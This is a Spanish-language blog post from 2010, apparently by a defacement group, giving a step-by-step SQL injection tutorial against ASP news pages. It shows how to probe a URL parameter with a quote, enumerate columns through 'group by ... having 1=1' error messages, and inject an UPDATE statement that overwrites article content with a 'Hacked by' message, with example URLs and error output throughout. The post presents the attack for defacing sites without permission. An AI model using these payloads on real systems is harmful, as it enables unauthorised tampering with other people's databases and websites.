diumenge, 26 de setembre del 2010

Injection en ASP (Modificando Contenido sin permisos)

Que es?
Es como el anterior error de ASP en la creacion.


1- Saber si es vulnerable
Para saber si la pagina web es vulnerable a este ataque devemos poner al final '
Ej: www.vulnerable.com/noticias.asp?id=3'
Si nos devuelve un error parecido al siguiente es vulnerable:

[Microsoft][ODBC SQL Server Driver][SQL Server]La columna 'Noticias.Id' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.

Nos deveria tirar unas tablas que a mi me salieron: Noticias.Id

2-Sacando Tablas
Para sacar tablas vamos a poner:
www.vulnerable.com/noticias.asp?id=3' group by Noticias.Id having 1=1

Emos puesto Noticias.id en el codigo porque es el nombre de la tabla que nos interesa ver las columnas para modificarlas.
Una vez eso deveria salirnos las columnas que una de ellas seria:

[Microsoft][ODBC SQL Server Driver][SQL Server]La columna 'Noticias.Titulo' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.

Ahora nos a sacado Noticias.Titulo, no me interesa el titulo asi que vamos a pasar de columna con el siguiente codigo:

' group by Noticias.Id,Noticias.Titulo having 1=1
En la web quedaria:
www.vulnerable.com/noticias.asp?id=3' group by Noticias.Id,Noticias.Titulo having 1=1

Esta vez para pasar de columna ponemos , y este seria el error que nos saldria:


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]La columna 'Noticias.Contenido' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.

Bien nos salio Noticias.Contenido vamos a modificarlo con ese codigo:

' update Noticias set Contenido = 'Hacked by FucK - Kosak0 Team'

En la web quedaria:
www.vulnerable.com/noticias.asp?id=3' update Noticias set Contenido = 'Hacked by FucK - Kosak0 Team'

Y se modificaria el contenido de la noticia por ese.
Porque en el codigo emos puesto " ' update "tabla que es Noticias" set "Columna que seria Contenido" = 'Mensaje que saldra'<

Espero que lo entendais xD si no preguntadmelo

Editado por 3rr0r
Publicat per a

Cap comentari:

Publica un comentari a l'entrada

Subscriure's a: Comentaris del missatge (Atom)